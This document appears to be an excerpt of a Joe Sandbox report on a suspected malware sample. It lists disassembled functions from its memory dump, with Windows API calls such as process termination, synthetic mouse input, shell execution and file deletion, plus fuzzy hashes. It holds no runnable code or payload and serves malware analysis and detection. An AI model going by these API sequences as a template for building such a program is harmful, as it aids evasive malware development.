ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0102F3AB,00000000,?,?,00000000,?,0102682C,00000004,00000000,00000000), ref: 0106824C
EnableWindow.USER32(?,00000000), ref: 01068272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 010682D1
ShowWindow.USER32(?,00000004), ref: 010682E5
EnableWindow.USER32(?,00000001), ref: 0106830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0106832F

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 939b55ca83048ae0befaa9515c43db00b4441fe11bdd575178f162aa8b62ffb7
Instruction ID: 54e64c139bba0a142953740dc92a6add78b4eed3eb48e958ab5c07680367ec67
Opcode Fuzzy Hash: 939b55ca83048ae0befaa9515c43db00b4441fe11bdd575178f162aa8b62ffb7
Instruction Fuzzy Hash: 6441B634601745AFEB62CF19C989BE47FE4FB0A714F1881EAE6D84F262C336A441CB50

Function 010522DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 010522E8

Part of subcall function 0104E4EC: GetWindowRect.USER32(?,?), ref: 0104E504

GetDesktopWindow.USER32 ref: 01052312
GetWindowRect.USER32(00000000), ref: 01052319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 01052355
GetCursorPos.USER32(?), ref: 01052381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 010523DF

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 542bb78cffd5feabcf9aada93cdfc9aff8896332d0c6ee7281101e72126dc520
Instruction ID: fb712ea66b6ff7a061fb2e3469481fd9ea4cc56bafbdea92a209e2d1a8353333
Opcode Fuzzy Hash: 542bb78cffd5feabcf9aada93cdfc9aff8896332d0c6ee7281101e72126dc520
Instruction Fuzzy Hash: 6E31C072504305AFD760DF58C848B9BBBE9FF88314F004A1AF9C597191DB35EA08CB92

Function 01034C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 01034C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 01034CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 01034CEA
_wcslen.LIBCMT ref: 01034D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 01034D10
_wcsstr.LIBVCRUNTIME ref: 01034D1A

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: cec01f035d1adcb300b0258e2c68cef497c3179f034d9f233b702f202448ec0f
Instruction ID: fc479a51ffd4a766ff670bf78b32f8ef197dc03479a174e6cf9ebbb90817b806
Opcode Fuzzy Hash: cec01f035d1adcb300b0258e2c68cef497c3179f034d9f233b702f202448ec0f
Instruction Fuzzy Hash: F52129316042047BFB656B3AAC49E7F7BDCDF89750F008069F845CE192DAB5DC0097A0

Function 01002D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,01005686,01013CD6,?,00000000,?,01005B6A,?,?,?,?,?,00FFE6D1,?,01098A48), ref: 01002D78
_free.LIBCMT ref: 01002DAB
_free.LIBCMT ref: 01002DD3
SetLastError.KERNEL32(00000000,?,?,?,?,00FFE6D1,?,01098A48,00000010,00FD4F4A,?,?,00000000,01013CD6), ref: 01002DE0
SetLastError.KERNEL32(00000000,?,?,?,?,00FFE6D1,?,01098A48,00000010,00FD4F4A,?,?,00000000,01013CD6), ref: 01002DEC
_abort.LIBCMT ref: 01002DF2

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 12a32c8aef166174ad8a3f15ebaf6cb1ee1c2c6879bf9f284002d0c477e37dca
Instruction ID: ab43fa3fc45d84008193599a5e874e7cda03b1ca8a7636f5b9baa96acc868ffb
Opcode Fuzzy Hash: 12a32c8aef166174ad8a3f15ebaf6cb1ee1c2c6879bf9f284002d0c477e37dca
Instruction Fuzzy Hash: 74F02832508A022BF6633238BC0CE9E2999BFD26A0F25041AF9E4D61D4EF298C018360

Function 01068A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00FE9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FE9693
Part of subcall function 00FE9639: SelectObject.GDI32(?,00000000), ref: 00FE96A2
Part of subcall function 00FE9639: BeginPath.GDI32(?), ref: 00FE96B9
Part of subcall function 00FE9639: SelectObject.GDI32(?,00000000), ref: 00FE96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 01068A4E
LineTo.GDI32(?,00000003,00000000), ref: 01068A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 01068A70
LineTo.GDI32(?,00000000,00000003), ref: 01068A80
EndPath.GDI32(?), ref: 01068A90
StrokePath.GDI32(?), ref: 01068AA0

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: e2c2d96fb0feab8e0e358713395c2a26bcca0d28bc69b22b2dab7d9cc41f6b0e
Instruction ID: 3480b82e0694cb24b77229cd34e5b4cbea4706829f4cbea44fd5649c4430f7c8
Opcode Fuzzy Hash: e2c2d96fb0feab8e0e358713395c2a26bcca0d28bc69b22b2dab7d9cc41f6b0e
Instruction Fuzzy Hash: 5D110C76000108BFFF119F94DC48E9A7FACEB09350F008052FA9599164C7769D55DB60

Function 0103EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0103EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0103EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0103EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0103EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0103EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0103EB75

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 62db7f1c7552a53eaeb4e56a77ec4cc1e32e16e34acf467a695ec815c96b4c51
Instruction ID: 3220390c6783093f670d22fbef60852efecbfe5e9880a61d94b404f8aad2f36e
Opcode Fuzzy Hash: 62db7f1c7552a53eaeb4e56a77ec4cc1e32e16e34acf467a695ec815c96b4c51
Instruction Fuzzy Hash: DDF01D72140158BBE63166529D0DEAB3A7CEFCAB11F000158F682D509496A96A0187B5

Function 0103C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD7620: _wcslen.LIBCMT ref: 00FD7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0103C6EE
_wcslen.LIBCMT ref: 0103C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0103C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0103C7CA

Strings

0, xrefs: 0103C6AF

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 0e2cdf25d6a96aed1b23a8a6c503ad195654a0f50a66952413b6de398728d37a
Instruction ID: 8a678475b35cdc1f0422fa41b00895a33975a406a59c9ad98296ecc964fdd0ca
Opcode Fuzzy Hash: 0e2cdf25d6a96aed1b23a8a6c503ad195654a0f50a66952413b6de398728d37a
Instruction Fuzzy Hash: 6051C2716043009BF7969E28CE45A6B7BECBFC9310F04096EFAD5E2191DB74D904D752

Function 0105AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0105AEA3

Part of subcall function 00FD7620: _wcslen.LIBCMT ref: 00FD7625

GetProcessId.KERNEL32(00000000), ref: 0105AF38
CloseHandle.KERNEL32(00000000), ref: 0105AF67

Strings

<, xrefs: 0105AE6B
@, xrefs: 0105AE72

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: b3720d775df7766dd7404f15c010a3ef6504057b8ff15af237cf49fe0d5b5cc6
Instruction ID: 2bc1446f029050c4df87eb08fd289dd321cb5bb1cd8ac783c9d7caf5817d01d4
Opcode Fuzzy Hash: b3720d775df7766dd7404f15c010a3ef6504057b8ff15af237cf49fe0d5b5cc6
Instruction Fuzzy Hash: 78718D71A00215DFCB54EF94D884A9EBBF1FF08310F08859AE856AB392D779ED41DB90

Function 0105C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0105C9F1
_wcslen.LIBCMT ref: 0105CA68
_wcslen.LIBCMT ref: 0105CA9E
_wcslen.LIBCMT ref: 0105CAF9
_wcslen.LIBCMT ref: 0105CB2F
_wcslen.LIBCMT ref: 0105CB7F

Strings

HKEY_LOCAL_MACHINE, xrefs: 0105CA62, 0105CA67
HKLM, xrefs: 0105CA98, 0105CA9D

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: _wcslen
String ID: HKEY_LOCAL_MACHINE$HKLM
API String ID: 176396367-4004644295
Opcode ID: dd36355957a4f5547ddffd77a9d9682d76612488d3c7d189ed7852701efae5b3
Instruction ID: 97d0fcb3eecaf7d94acdaeb77ecda2f3ca7aa577257fe90585586680fc4c86b0
Opcode Fuzzy Hash: dd36355957a4f5547ddffd77a9d9682d76612488d3c7d189ed7852701efae5b3
Instruction Fuzzy Hash: 9F310633A002654BEBB1DF6CDA500BF3FD99B91658F094099ECC1AB346E6B1CD40E7A0

Function 00FF4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FF4D1E,010028E9,?,00FF4CBE,010028E9,010988B8,0000000C,00FF4E15,010028E9,00000002), ref: 00FF4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FF4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00FF4D1E,010028E9,?,00FF4CBE,010028E9,010988B8,0000000C,00FF4E15,010028E9,00000002,00000000), ref: 00FF4DC3

Strings

mscoree.dll, xrefs: 00FF4D86
CorExitProcess, xrefs: 00FF4D98

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2c62f88320cfa4c10b01eab3be737b0852af885945167f3701a1160a33231e64
Instruction ID: 7bf1decf2e549fd073ddcfb205bc04de0baba1e36d803bb84dc5b745f9cea217
Opcode Fuzzy Hash: 2c62f88320cfa4c10b01eab3be737b0852af885945167f3701a1160a33231e64
Instruction Fuzzy Hash: F0F0C830E0020CBBEB209F90DD09BAEBFF4EF45711F000158F985A6164CB355D40DB94

Function 01042947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01042C05
DeleteFileW.KERNEL32(?), ref: 01042C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01042C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01042CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01042CC0

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 3267c2b79cbf979dba60336d3a5dc87acde82c62e719aa6fde1a28c77e9e7684
Instruction ID: a63eff196d25636b92cb02e95866bdccbf3afe0d9e3892897900dc3ac2b9c6c1
Opcode Fuzzy Hash: 3267c2b79cbf979dba60336d3a5dc87acde82c62e719aa6fde1a28c77e9e7684
Instruction Fuzzy Hash: BCB160B1E0011DABDF21DBA4DC85EEE7BBDEF48340F0440A6F649E6151EA359A448FA1

Function 0105A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0105A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0105A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0105A468
CloseHandle.KERNEL32(?), ref: 0105A63D

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 949ce2cf0a9e51ed324bd79e3eb4b116e8fd4732cdcf8cf9f8ea11ac76027ad6
Instruction ID: b07e5a67c9646086e45879c47f812576e28d86f81faf07df9fd0ab9af71ef79d
Opcode Fuzzy Hash: 949ce2cf0a9e51ed324bd79e3eb4b116e8fd4732cdcf8cf9f8ea11ac76027ad6
Instruction Fuzzy Hash: 89A191716043019FE760DF18C882F2AB7E5AF88714F04895DF99A9B392DBB4E841CB91

Function 0103E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0103DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0103CF22,?), ref: 0103DDFD

Part of subcall function 0103DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0103CF22,?), ref: 0103DE16

Part of subcall function 0103E199: GetFileAttributesW.KERNEL32(?,0103CF95), ref: 0103E19A

lstrcmpiW.KERNEL32(?,?), ref: 0103E473
MoveFileW.KERNEL32(?,?), ref: 0103E4AC
_wcslen.LIBCMT ref: 0103E5EB
_wcslen.LIBCMT ref: 0103E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0103E650

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 0b7a21c2aebde0ff61d378a242a7155150480cef422cda8e238128ab60b72367
Instruction ID: 734798e4fdda73d3fbddd8580ad3013dfeb4549eaf63b14e87716a0fae79396f
Opcode Fuzzy Hash: 0b7a21c2aebde0ff61d378a242a7155150480cef422cda8e238128ab60b72367
Instruction Fuzzy Hash: 2B5161B25083459BD764EBA4DC809DF77ECAFC5340F004A1EE6C9D3191EF79A2888766

Function 01038BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01038BCD
VariantClear.OLEAUT32 ref: 01038C3E
VariantClear.OLEAUT32 ref: 01038C9D
VariantClear.OLEAUT32(?), ref: 01038D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 01038D3B

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: e1b22e08fb92f588f9b90397cda81371e2b35571bf3deb543f69e7e65a5b3ffb
Instruction ID: 4c57303cfe24c74984ec4fa25bc0be828649206c2646bc0da0f0b6e4ad1cf8ff
Opcode Fuzzy Hash: e1b22e08fb92f588f9b90397cda81371e2b35571bf3deb543f69e7e65a5b3ffb
Instruction Fuzzy Hash: F8516BB5A00219EFDB10DF58C884AAABBF8FF89310F05859AF945DB314E734E911CB90

Function 01048AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 01048BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 01048BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 01048C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 01048C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 01048C5F

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 123ae2db6a75167dcb7dc9a4ed91071402d877f643244243a77136b3c37ebe1d
Instruction ID: c8f0c411d548b07e0ec7e810e1bc14cd7761169dc931db02e2f078c06f97984f
Opcode Fuzzy Hash: 123ae2db6a75167dcb7dc9a4ed91071402d877f643244243a77136b3c37ebe1d
Instruction Fuzzy Hash: 67515A75A002199FDB11DF65C880A69BBF2FF48314F08C49AE849AB362DB35ED41DB91

Function 01066B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 01066C33
SetWindowLongW.USER32(?,000000EC,?), ref: 01066C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 01066C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0104AB79,00000000,00000000), ref: 01066C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 01066CC7

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 542a870305ee342cd1523bd96198f2c0d9a108e796d3ecb78b231cfe0fcf1a9f
